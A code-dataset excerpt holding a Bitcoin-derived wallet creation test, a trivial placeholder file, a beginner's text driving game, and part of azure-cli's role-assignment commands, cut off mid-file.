| column | type |
|---|---|
| hexsha | string (length 40) |
| size | int64 (4 .. 1.02M) |
| ext | string (8 classes) |
| lang | string (1 class) |
| max_stars_repo_path | string (length 4 .. 209) |
| max_stars_repo_name | string (length 5 .. 121) |
| max_stars_repo_head_hexsha | string (length 40) |
| max_stars_repo_licenses | list (length 1 .. 10) |
| max_stars_count | int64 (1 .. 191k), nullable |
| max_stars_repo_stars_event_min_datetime | string (length 24), nullable |
| max_stars_repo_stars_event_max_datetime | string (length 24), nullable |
| max_issues_repo_path | string (length 4 .. 209) |
| max_issues_repo_name | string (length 5 .. 121) |
| max_issues_repo_head_hexsha | string (length 40) |
| max_issues_repo_licenses | list (length 1 .. 10) |
| max_issues_count | int64 (1 .. 67k), nullable |
| max_issues_repo_issues_event_min_datetime | string (length 24), nullable |
| max_issues_repo_issues_event_max_datetime | string (length 24), nullable |
| max_forks_repo_path | string (length 4 .. 209) |
| max_forks_repo_name | string (length 5 .. 121) |
| max_forks_repo_head_hexsha | string (length 40) |
| max_forks_repo_licenses | list (length 1 .. 10) |
| max_forks_count | int64 (1 .. 105k), nullable |
| max_forks_repo_forks_event_min_datetime | string (length 24), nullable |
| max_forks_repo_forks_event_max_datetime | string (length 24), nullable |
| content | string (length 4 .. 1.02M) |
| avg_line_length | float64 (1.07 .. 66.1k) |
| max_line_length | int64 (4 .. 266k) |
| alphanum_fraction | float64 (0.01 .. 1) |
hexsha: c808c4f4356cd1279f904adaa9ac62f021b2a691 | size: 9,874 | ext: py | lang: Python
max_stars: path test/functional/wallet_createwallet.py | repo mrheat/doichain-core-rebase | head 975aa7d438dbdb0baf352299afb3daf70318d37b | licenses ["MIT"] | count 459 | events 2015-09-25T22:46:28.000Z .. 2022-02-27T18:01:48.000Z
max_issues: path test/functional/wallet_createwallet.py | repo mrheat/doichain-core-rebase | head 975aa7d438dbdb0baf352299afb3daf70318d37b | licenses ["MIT"] | count 472 | events 2015-09-17T09:42:03.000Z .. 2022-03-29T05:29:04.000Z
max_forks: path test/functional/wallet_createwallet.py | repo mrheat/doichain-core-rebase | head 975aa7d438dbdb0baf352299afb3daf70318d37b | licenses ["MIT"] | count 209 | events 2015-10-04T00:49:49.000Z .. 2022-03-24T11:05:09.000Z
content:
#!/usr/bin/env python3
# Copyright (c) 2018-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test createwallet arguments.
"""
from test_framework.address import key_to_p2wpkh
from test_framework.descriptors import descsum_create
from test_framework.key import ECKey
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
from test_framework.wallet_util import bytes_to_wif, generate_wif_key
class CreateWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [['-addresstype=bech32']] * self.num_nodes
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.generate(node, 1) # Leave IBD for sethdseed
self.nodes[0].createwallet(wallet_name='w0')
w0 = node.get_wallet_rpc('w0')
address1 = w0.getnewaddress()
self.log.info("Test disableprivatekeys creation.")
self.nodes[0].createwallet(wallet_name='w1', disable_private_keys=True)
w1 = node.get_wallet_rpc('w1')
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w1.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w1.getrawchangeaddress)
w1.importpubkey(w0.getaddressinfo(address1)['pubkey'])
self.log.info('Test that private keys cannot be imported')
eckey = ECKey()
eckey.generate()
privkey = bytes_to_wif(eckey.get_bytes())
assert_raises_rpc_error(-4, 'Cannot import private keys to a wallet with private keys disabled', w1.importprivkey, privkey)
if self.options.descriptors:
result = w1.importdescriptors([{'desc': descsum_create('wpkh(' + privkey + ')'), 'timestamp': 'now'}])
else:
result = w1.importmulti([{'scriptPubKey': {'address': key_to_p2wpkh(eckey.get_pubkey().get_bytes())}, 'timestamp': 'now', 'keys': [privkey]}])
assert not result[0]['success']
assert 'warning' not in result[0]
assert_equal(result[0]['error']['code'], -4)
assert_equal(result[0]['error']['message'], 'Cannot import private keys to a wallet with private keys disabled')
self.log.info("Test blank creation with private keys disabled.")
self.nodes[0].createwallet(wallet_name='w2', disable_private_keys=True, blank=True)
w2 = node.get_wallet_rpc('w2')
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w2.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w2.getrawchangeaddress)
w2.importpubkey(w0.getaddressinfo(address1)['pubkey'])
self.log.info("Test blank creation with private keys enabled.")
self.nodes[0].createwallet(wallet_name='w3', disable_private_keys=False, blank=True)
w3 = node.get_wallet_rpc('w3')
assert_equal(w3.getwalletinfo()['keypoolsize'], 0)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w3.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w3.getrawchangeaddress)
# Import private key
w3.importprivkey(generate_wif_key())
# Imported private keys are currently ignored by the keypool
assert_equal(w3.getwalletinfo()['keypoolsize'], 0)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w3.getnewaddress)
# Set the seed
if self.options.descriptors:
w3.importdescriptors([{
'desc': descsum_create('wpkh(tprv8ZgxMBicQKsPcwuZGKp8TeWppSuLMiLe2d9PupB14QpPeQsqoj3LneJLhGHH13xESfvASyd4EFLJvLrG8b7DrLxEuV7hpF9uUc6XruKA1Wq/0h/*)'),
'timestamp': 'now',
'active': True
},
{
'desc': descsum_create('wpkh(tprv8ZgxMBicQKsPcwuZGKp8TeWppSuLMiLe2d9PupB14QpPeQsqoj3LneJLhGHH13xESfvASyd4EFLJvLrG8b7DrLxEuV7hpF9uUc6XruKA1Wq/1h/*)'),
'timestamp': 'now',
'active': True,
'internal': True
}])
else:
w3.sethdseed()
assert_equal(w3.getwalletinfo()['keypoolsize'], 1)
w3.getnewaddress()
w3.getrawchangeaddress()
self.log.info("Test blank creation with privkeys enabled and then encryption")
self.nodes[0].createwallet(wallet_name='w4', disable_private_keys=False, blank=True)
w4 = node.get_wallet_rpc('w4')
assert_equal(w4.getwalletinfo()['keypoolsize'], 0)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w4.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w4.getrawchangeaddress)
# Encrypt the wallet. Nothing should change about the keypool
w4.encryptwallet('pass')
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w4.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w4.getrawchangeaddress)
# Now set a seed and it should work. Wallet should also be encrypted
w4.walletpassphrase('pass', 60)
if self.options.descriptors:
w4.importdescriptors([{
'desc': descsum_create('wpkh(tprv8ZgxMBicQKsPcwuZGKp8TeWppSuLMiLe2d9PupB14QpPeQsqoj3LneJLhGHH13xESfvASyd4EFLJvLrG8b7DrLxEuV7hpF9uUc6XruKA1Wq/0h/*)'),
'timestamp': 'now',
'active': True
},
{
'desc': descsum_create('wpkh(tprv8ZgxMBicQKsPcwuZGKp8TeWppSuLMiLe2d9PupB14QpPeQsqoj3LneJLhGHH13xESfvASyd4EFLJvLrG8b7DrLxEuV7hpF9uUc6XruKA1Wq/1h/*)'),
'timestamp': 'now',
'active': True,
'internal': True
}])
else:
w4.sethdseed()
w4.getnewaddress()
w4.getrawchangeaddress()
self.log.info("Test blank creation with privkeys disabled and then encryption")
self.nodes[0].createwallet(wallet_name='w5', disable_private_keys=True, blank=True)
w5 = node.get_wallet_rpc('w5')
assert_equal(w5.getwalletinfo()['keypoolsize'], 0)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w5.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w5.getrawchangeaddress)
# Encrypt the wallet
assert_raises_rpc_error(-16, "Error: wallet does not contain private keys, nothing to encrypt.", w5.encryptwallet, 'pass')
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w5.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", w5.getrawchangeaddress)
self.log.info('New blank and encrypted wallets can be created')
self.nodes[0].createwallet(wallet_name='wblank', disable_private_keys=False, blank=True, passphrase='thisisapassphrase')
wblank = node.get_wallet_rpc('wblank')
assert_raises_rpc_error(-13, "Error: Please enter the wallet passphrase with walletpassphrase first.", wblank.signmessage, "needanargument", "test")
wblank.walletpassphrase('thisisapassphrase', 60)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", wblank.getnewaddress)
assert_raises_rpc_error(-4, "Error: This wallet has no available keys", wblank.getrawchangeaddress)
self.log.info('Test creating a new encrypted wallet.')
# Born encrypted wallet is created (has keys)
self.nodes[0].createwallet(wallet_name='w6', disable_private_keys=False, blank=False, passphrase='thisisapassphrase')
w6 = node.get_wallet_rpc('w6')
assert_raises_rpc_error(-13, "Error: Please enter the wallet passphrase with walletpassphrase first.", w6.signmessage, "needanargument", "test")
w6.walletpassphrase('thisisapassphrase', 60)
w6.signmessage(w6.getnewaddress('', 'legacy'), "test")
w6.keypoolrefill(1)
# There should only be 1 key for legacy, 4 for descriptors
walletinfo = w6.getwalletinfo()
keys = 4 if self.options.descriptors else 1
assert_equal(walletinfo['keypoolsize'], keys)
assert_equal(walletinfo['keypoolsize_hd_internal'], keys)
# Allow empty passphrase, but there should be a warning
resp = self.nodes[0].createwallet(wallet_name='w7', disable_private_keys=False, blank=False, passphrase='')
assert 'Empty string given as passphrase, wallet will not be encrypted.' in resp['warning']
w7 = node.get_wallet_rpc('w7')
assert_raises_rpc_error(-15, 'Error: running with an unencrypted wallet, but walletpassphrase was called.', w7.walletpassphrase, '', 60)
self.log.info('Test making a wallet with avoid reuse flag')
self.nodes[0].createwallet('w8', False, False, '', True) # Use positional arguments to check for bug where avoid_reuse could not be set for wallets without needing them to be encrypted
w8 = node.get_wallet_rpc('w8')
assert_raises_rpc_error(-15, 'Error: running with an unencrypted wallet, but walletpassphrase was called.', w8.walletpassphrase, '', 60)
assert_equal(w8.getwalletinfo()["avoid_reuse"], True)
self.log.info('Using a passphrase with private keys disabled returns error')
assert_raises_rpc_error(-4, 'Passphrase provided but private keys are disabled. A passphrase is only used to encrypt private keys, so cannot be used for wallets with private keys disabled.', self.nodes[0].createwallet, wallet_name='w9', disable_private_keys=True, passphrase='thisisapassphrase')
if __name__ == '__main__':
CreateWalletTest().main()
avg_line_length: 58.082353 | max_line_length: 303 | alphanum_fraction: 0.691513
hexsha: 49317b1e826dcbe7dd96e4f9f1dc02a6bf0487fa | size: 7 | ext: py | lang: Python
max_stars: path example/scikitlogistic/cloudmesh_ai/test.py | repo cloudmesh-community/fa19-516-174 | head 1b1aed0dcb4aa2fbe70de86a281c089a75f7aa72 | licenses ["Apache-2.0"] | count null | events null
max_issues: path example/scikitlogistic/cloudmesh_ai/test.py | repo cloudmesh-community/fa19-516-174 | head 1b1aed0dcb4aa2fbe70de86a281c089a75f7aa72 | licenses ["Apache-2.0"] | count null | events null
max_forks: path example/scikitlogistic/cloudmesh_ai/test.py | repo cloudmesh-community/fa19-516-174 | head 1b1aed0dcb4aa2fbe70de86a281c089a75f7aa72 | licenses ["Apache-2.0"] | count null | events null
content:
file
avg_line_length: 1.75 | max_line_length: 4 | alphanum_fraction: 0.571429
hexsha: fe4462e7e739295a8ba63644ced68f486b8ae992 | size: 767 | ext: py | lang: Python
max_stars: path game.py | repo hyemi0/enjoy_python | head 434e332d014d116c3f2f82b9a55440e9c40e6934 | licenses ["MIT"] | count null | events null
max_issues: path game.py | repo hyemi0/enjoy_python | head 434e332d014d116c3f2f82b9a55440e9c40e6934 | licenses ["MIT"] | count null | events null
max_forks: path game.py | repo hyemi0/enjoy_python | head 434e332d014d116c3f2f82b9a55440e9c40e6934 | licenses ["MIT"] | count null | events null
content:
# Start with 50 points!
print("You got caught at a traffic light. Will you wait?")
a = input("Enter your choice: ")
if a == "1":  # when a is 1
    print("1: Wait. The light turns green in 30 seconds.")
elif a == "2":  # when a is 2
    print("2: Don't wait. That is a traffic violation. Please wait; the light turns green in 30 seconds.")
else:  # when a is not 1
    print("Invalid choice.")
# score +20
# score -10
print("The light has turned green. Go ahead.")
print("This is a CCTV enforcement zone. Driving over 30 km/h means a fine. Will you drive over 30 km/h?")
print("1 : Drive under 30 km/h. 2 : Drive over 30 km/h.")
a = input("Enter your choice: ")
if a == "1":
    print("You pass.")
else:
    print("That is a 300,000 won fine.")
# if 1 was entered
# points +30
# if 2 was entered
# points -30
print("Slow down. There is an obstacle ahead. Will you go around it?")
print("1 : Go around it. 2 : Keep going.")
print("===========")
a = input("Enter your choice: ")
print("======{}=====".format(type(a)))
if a == "1":
    print("SUCCESS! ! ! ")  # if 1 was entered == 1
else:
    print("Game over. Would you like to try again?")  # if 2 was entered
avg_line_length: 21.305556 | max_line_length: 63 | alphanum_fraction: 0.611473
hexsha: f7991d6350eb0c86d8b2b480cac642c219fac4db | size: 66,393 | ext: py | lang: Python
max_stars: path src/command_modules/azure-cli-role/azure/cli/command_modules/role/custom.py | repo srinathnarayanan/azure-cli | head b98bddc8dd18e6cb15fc44a6dc160b02a0bd255a | licenses ["MIT"] | count null | events null
max_issues: path src/command_modules/azure-cli-role/azure/cli/command_modules/role/custom.py | repo srinathnarayanan/azure-cli | head b98bddc8dd18e6cb15fc44a6dc160b02a0bd255a | licenses ["MIT"] | count null | events null
max_forks: path src/command_modules/azure-cli-role/azure/cli/command_modules/role/custom.py | repo srinathnarayanan/azure-cli | head b98bddc8dd18e6cb15fc44a6dc160b02a0bd255a | licenses ["MIT"] | count null | events null
content:
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import base64
import datetime
import json
import re
import os
import uuid
import itertools
from dateutil.relativedelta import relativedelta
import dateutil.parser
from knack.log import get_logger
from knack.util import CLIError, todict
from msrest.serialization import TZ_UTC
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.profiles import ResourceType, get_api_version
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.util import get_file_json, shell_safe_json_parse
from azure.graphrbac.models import (ApplicationCreateParameters, ApplicationUpdateParameters, PasswordCredential,
KeyCredential, UserCreateParameters, PasswordProfile,
ServicePrincipalCreateParameters, RequiredResourceAccess,
ResourceAccess, GroupCreateParameters, CheckGroupMembershipParameters)
from ._client_factory import _auth_client_factory, _graph_client_factory
from ._multi_api_adaptor import MultiAPIAdaptor
logger = get_logger(__name__)
# pylint: disable=too-many-lines
def list_role_definitions(cmd, name=None, resource_group_name=None, scope=None,
custom_role_only=False):
definitions_client = _auth_client_factory(cmd.cli_ctx, scope).role_definitions
scope = _build_role_scope(resource_group_name, scope,
definitions_client.config.subscription_id)
return _search_role_definitions(cmd.cli_ctx, definitions_client, name, scope, custom_role_only)
def create_role_definition(cmd, role_definition):
return _create_update_role_definition(cmd, role_definition, for_update=False)
def update_role_definition(cmd, role_definition):
return _create_update_role_definition(cmd, role_definition, for_update=True)
def _create_update_role_definition(cmd, role_definition, for_update):
definitions_client = _auth_client_factory(cmd.cli_ctx).role_definitions
if os.path.exists(role_definition):
role_definition = get_file_json(role_definition)
else:
role_definition = shell_safe_json_parse(role_definition)
if not isinstance(role_definition, dict):
raise CLIError('Invalid role definition. A valid dictionary JSON representation is expected.')
# to workaround service defects, ensure property names are camel case
names = [p for p in role_definition if p[:1].isupper()]
for n in names:
new_name = n[:1].lower() + n[1:]
role_definition[new_name] = role_definition.pop(n)
role_name = role_definition.get('name', None)
if not role_name:
raise CLIError("please provide role name")
if for_update: # for update, we need to use guid style unique name
scopes_in_definition = role_definition.get('assignableScopes', None)
scope = (scopes_in_definition[0] if scopes_in_definition else
'/subscriptions/' + definitions_client.config.subscription_id)
matched = _search_role_definitions(cmd.cli_ctx, definitions_client, role_name, scope)
if len(matched) != 1:
raise CLIError('Please provide the unique logic name of an existing role')
role_definition['name'] = matched[0].name
# ensure correct logical name and guid name. For update we accept both
worker = MultiAPIAdaptor(cmd.cli_ctx)
role_name = worker.get_role_property(matched[0], 'role_name')
role_id = matched[0].name
else:
role_id = _gen_guid()
if not for_update and 'assignableScopes' not in role_definition:
raise CLIError("please provide 'assignableScopes'")
worker = MultiAPIAdaptor(cmd.cli_ctx)
return worker.create_role_definition(definitions_client, role_name, role_id, role_definition)
def delete_role_definition(cmd, name, resource_group_name=None, scope=None,
custom_role_only=False):
definitions_client = _auth_client_factory(cmd.cli_ctx, scope).role_definitions
scope = _build_role_scope(resource_group_name, scope,
definitions_client.config.subscription_id)
roles = _search_role_definitions(cmd.cli_ctx, definitions_client, name, scope, custom_role_only)
for r in roles:
definitions_client.delete(role_definition_id=r.name, scope=scope)
def _search_role_definitions(cli_ctx, definitions_client, name, scope, custom_role_only=False):
roles = list(definitions_client.list(scope))
worker = MultiAPIAdaptor(cli_ctx)
if name:
roles = [r for r in roles if r.name == name or worker.get_role_property(r, 'role_name') == name]
if custom_role_only:
roles = [r for r in roles if worker.get_role_property(r, 'role_type') == 'CustomRole']
return roles
def create_role_assignment(cmd, role, assignee=None, assignee_object_id=None, resource_group_name=None,
scope=None):
if bool(assignee) == bool(assignee_object_id):
raise CLIError('usage error: --assignee STRING | --assignee-object-id GUID')
return _create_role_assignment(cmd.cli_ctx, role, assignee or assignee_object_id, resource_group_name, scope,
resolve_assignee=(not assignee_object_id))
def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None,
resolve_assignee=True):
factory = _auth_client_factory(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
worker = MultiAPIAdaptor(cli_ctx)
return worker.create_role_assignment(assignments_client, _gen_guid(), role_id, object_id, scope)
def list_role_assignments(cmd, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False,
show_all=False, include_groups=False, include_classic_administrators=False):
'''
:param include_groups: include extra assignments to the groups of which the user is a
member(transitively).
'''
graph_client = _graph_client_factory(cmd.cli_ctx)
factory = _auth_client_factory(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
if show_all:
if resource_group_name or scope:
raise CLIError('group or scope are not required when --all is used')
scope = None
else:
scope = _build_role_scope(resource_group_name, scope,
definitions_client.config.subscription_id)
assignments = _search_role_assignments(cmd.cli_ctx, assignments_client, definitions_client,
scope, assignee, role,
include_inherited, include_groups)
results = todict(assignments) if assignments else []
if include_classic_administrators:
results += _backfill_assignments_for_co_admins(cmd.cli_ctx, factory, assignee)
if not results:
return []
# 1. fill in logical names to make the output understandable.
# (it's possible that associated roles and principals were deleted, and we just do nothing.)
# 2. fill in role names
role_defs = list(definitions_client.list(
scope=scope or ('/subscriptions/' + definitions_client.config.subscription_id)))
worker = MultiAPIAdaptor(cmd.cli_ctx)
role_dics = {i.id: worker.get_role_property(i, 'role_name') for i in role_defs}
for i in results:
if not i.get('roleDefinitionName'):
if role_dics.get(worker.get_role_property(i, 'roleDefinitionId')):
worker.set_role_property(i, 'roleDefinitionName',
role_dics[worker.get_role_property(i, 'roleDefinitionId')])
else:
i['roleDefinitionName'] = None # the role definition might have been deleted
# fill in principal names
principal_ids = set(worker.get_role_property(i, 'principalId')
for i in results if worker.get_role_property(i, 'principalId'))
if principal_ids:
try:
principals = _get_object_stubs(graph_client, principal_ids)
principal_dics = {i.object_id: _get_displayable_name(i) for i in principals}
for i in [r for r in results if not r.get('principalName')]:
i['principalName'] = ''
if principal_dics.get(worker.get_role_property(i, 'principalId')):
worker.set_role_property(i, 'principalName',
principal_dics[worker.get_role_property(i, 'principalId')])
except (CloudError, GraphErrorException) as ex:
# failure on resolving principal due to graph permission should not fail the whole thing
logger.info("Failed to resolve graph object information per error '%s'", ex)
for r in results:
if not r.get('additionalProperties'): # remove the useless "additionalProperties"
r.pop('additionalProperties', None)
return results
def _get_assignment_events(cli_ctx, start_time=None, end_time=None):
from azure.mgmt.monitor import MonitorManagementClient
from azure.cli.core.commands.client_factory import get_mgmt_service_client
client = get_mgmt_service_client(cli_ctx, MonitorManagementClient)
DATE_TIME_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
if end_time:
try:
end_time = datetime.datetime.strptime(end_time, DATE_TIME_FORMAT)
except ValueError:
raise CLIError("Input '{}' is not valid datetime. Valid example: 2000-12-31T12:59:59Z".format(end_time))
else:
end_time = datetime.datetime.utcnow()
if start_time:
try:
start_time = datetime.datetime.strptime(start_time, DATE_TIME_FORMAT)
if start_time >= end_time:
raise CLIError("Start time cannot be later than end time.")
except ValueError:
raise CLIError("Input '{}' is not valid datetime. Valid example: 2000-12-31T12:59:59Z".format(start_time))
else:
start_time = end_time - datetime.timedelta(hours=1)
time_filter = 'eventTimestamp ge {} and eventTimestamp le {}'.format(start_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
end_time.strftime('%Y-%m-%dT%H:%M:%SZ'))
# set time range filter
odata_filters = 'resourceProvider eq Microsoft.Authorization and {}'.format(time_filter)
activity_log = list(client.activity_logs.list(filter=odata_filters))
start_events, end_events, offline_events = {}, {}, []
for l in activity_log:
if l.http_request:
if l.status.value == 'Started':
start_events[l.operation_id] = l
else:
end_events[l.operation_id] = l
elif l.event_name and l.event_name.value.lower() == 'classicadministrators':
offline_events.append(l)
return start_events, end_events, offline_events, client
# A custom command around 'monitoring' events to produce understandable output for RBAC audit, a common scenario.
def list_role_assignment_change_logs(cmd, start_time=None, end_time=None):
# pylint: disable=too-many-nested-blocks, too-many-statements
result = []
worker = MultiAPIAdaptor(cmd.cli_ctx)
start_events, end_events, offline_events, client = _get_assignment_events(cmd.cli_ctx, start_time, end_time)
role_defs = {d.id: [worker.get_role_property(d, 'role_name'),
d.id.split('/')[-1]] for d in list_role_definitions(cmd)}
for op_id in start_events:
e = end_events.get(op_id, None)
if not e:
continue
entry = {}
op = e.operation_name and e.operation_name.value
if (op.lower().startswith('microsoft.authorization/roleassignments') and e.status.value == 'Succeeded'):
s, payload = start_events[op_id], None
entry = dict.fromkeys(
['principalId', 'principalName', 'scope', 'scopeName', 'scopeType', 'roleDefinitionId', 'roleName'],
None)
entry['timestamp'], entry['caller'] = e.event_timestamp, s.caller
if s.http_request:
if s.http_request.method == 'PUT':
# 'requestbody' has a wrong camel-case. Should be 'requestBody'
payload = s.properties and s.properties.get('requestbody')
entry['action'] = 'Granted'
entry['scope'] = e.authorization.scope
elif s.http_request.method == 'DELETE':
payload = e.properties and e.properties.get('responseBody')
entry['action'] = 'Revoked'
if payload:
try:
payload = json.loads(payload)
except ValueError:
pass
if payload:
payload = payload['properties']
entry['principalId'] = payload['principalId']
if not entry['scope']:
entry['scope'] = payload['scope']
if entry['scope']:
index = entry['scope'].lower().find('/providers/microsoft.authorization')
if index != -1:
entry['scope'] = entry['scope'][:index]
parts = list(filter(None, entry['scope'].split('/')))
entry['scopeName'] = parts[-1]
if len(parts) < 3:
entry['scopeType'] = 'Subscription'
elif len(parts) < 5:
entry['scopeType'] = 'Resource group'
else:
entry['scopeType'] = 'Resource'
entry['roleDefinitionId'] = role_defs[payload['roleDefinitionId']][1]
entry['roleName'] = role_defs[payload['roleDefinitionId']][0]
result.append(entry)
# Fill in logical user/sp names since GUID principal IDs are not readable
principal_ids = set([x['principalId'] for x in result if x['principalId']])
if principal_ids:
graph_client = _graph_client_factory(cmd.cli_ctx)
stubs = _get_object_stubs(graph_client, principal_ids)
principal_dics = {i.object_id: _get_displayable_name(i) for i in stubs}
if principal_dics:
for e in result:
e['principalName'] = principal_dics.get(e['principalId'], None)
offline_events = [x for x in offline_events if (x.status and x.status.value == 'Succeeded' and x.operation_name and
x.operation_name.value.lower().startswith(
'microsoft.authorization/classicadministrators'))]
for e in offline_events:
entry = {
'timestamp': e.event_timestamp,
'caller': 'Subscription Admin',
'roleDefinitionId': None,
'principalId': None,
'principalType': 'User',
'scope': '/subscriptions/' + client.config.subscription_id,
'scopeType': 'Subscription',
'scopeName': client.config.subscription_id,
}
if e.properties:
entry['principalName'] = e.properties.get('adminEmail')
entry['roleName'] = e.properties.get('adminType')
result.append(entry)
return result
def _backfill_assignments_for_co_admins(cli_ctx, auth_client, assignee=None):
worker = MultiAPIAdaptor(cli_ctx)
co_admins = auth_client.classic_administrators.list() # known swagger bug on api-version handling
co_admins = [x for x in co_admins if x.email_address]
graph_client = _graph_client_factory(cli_ctx)
if assignee: # apply assignee filter if applicable
if _is_guid(assignee):
try:
result = _get_object_stubs(graph_client, [assignee])
if not result:
return []
assignee = _get_displayable_name(result[0]).lower()
except ValueError:
pass
co_admins = [x for x in co_admins if assignee == x.email_address.lower()]
if not co_admins:
return []
result, users = [], []
for i in range(0, len(co_admins), 10): # graph allows up to 10 query filters, so split into chunks here
upn_queries = ["userPrincipalName eq '{}'".format(x.email_address)
for x in co_admins[i:i + 10]]
temp = list(list_users(graph_client.users, query_filter=' or '.join(upn_queries)))
users += temp
upns = {u.user_principal_name: u.object_id for u in users}
for admin in co_admins:
na_text = 'NA(classic admins)'
email = admin.email_address
result.append({
'id': na_text,
'name': na_text,
})
properties = {
'principalId': upns.get(email),
'principalName': email,
'roleDefinitionName': admin.role,
'roleDefinitionId': 'NA(classic admin role)',
'scope': '/subscriptions/' + auth_client.config.subscription_id
}
if worker.old_api:
result[-1]['properties'] = properties
else:
result[-1].update(properties)
return result
def _get_displayable_name(graph_object):
if getattr(graph_object, 'user_principal_name', None):
return graph_object.user_principal_name
elif getattr(graph_object, 'service_principal_names', None):
return graph_object.service_principal_names[0]
return graph_object.display_name or ''
def delete_role_assignments(cmd, ids=None, assignee=None, role=None,
resource_group_name=None, scope=None, include_inherited=False):
factory = _auth_client_factory(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cmd.cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
else:
raise CLIError('No matched assignments were found to delete')
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee, fallback_to_object_id=True)
# combining filters is unsupported, so we pick the best, and do limited manual filtering
if assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
elif scope:
assignments = list(assignments_client.list_for_scope(scope=scope, filter='atScope()'))
else:
assignments = list(assignments_client.list())
worker = MultiAPIAdaptor(cli_ctx)
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(worker.get_role_property(a, 'scope'), scope, re.I) or
worker.get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if worker.get_role_property(i, 'role_definition_id') == role_id]
return assignments
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
if re.match(r'/subscriptions/.+/providers/Microsoft.Authorization/roleDefinitions/',
role, re.I):
role_id = role
else:
if _is_guid(role):
role_id = '/subscriptions/{}/providers/Microsoft.Authorization/roleDefinitions/{}'.format(
definitions_client.config.subscription_id, role)
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
elif len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def list_apps(cmd, app_id=None, display_name=None, identifier_uri=None, query_filter=None, include_all=None,
show_mine=None):
client = _graph_client_factory(cmd.cli_ctx)
if show_mine:
return list_owned_objects(client.signed_in_user, 'application')
sub_filters = []
if query_filter:
sub_filters.append(query_filter)
if app_id:
sub_filters.append("appId eq '{}'".format(app_id))
if display_name:
sub_filters.append("startswith(displayName,'{}')".format(display_name))
if identifier_uri:
sub_filters.append("identifierUris/any(s:s eq '{}')".format(identifier_uri))
result = client.applications.list(filter=(' and '.join(sub_filters)))
if sub_filters or include_all:
return result
else:
result = list(itertools.islice(result, 101))
if len(result) == 101:
logger.warning("The result is not complete. You can still use '--all' to get all of them with"
" long latency expected, or provide a filter through command arguments")
return result[:100]
def list_application_owners(cmd, identifier):
client = _graph_client_factory(cmd.cli_ctx).applications
return client.list_owners(_resolve_application(client, identifier))
def add_application_owner(cmd, owner_object_id, identifier):
graph_client = _graph_client_factory(cmd.cli_ctx)
owner_url = _get_owner_url(cmd.cli_ctx, owner_object_id)
return graph_client.applications.add_owner(_resolve_application(graph_client.applications, identifier), owner_url)
def remove_application_owner(cmd, owner_object_id, identifier):
client = _graph_client_factory(cmd.cli_ctx).applications
return client.remove_owner(_resolve_application(client, identifier), owner_object_id)
def list_sps(cmd, spn=None, display_name=None, query_filter=None, show_mine=None, include_all=None):
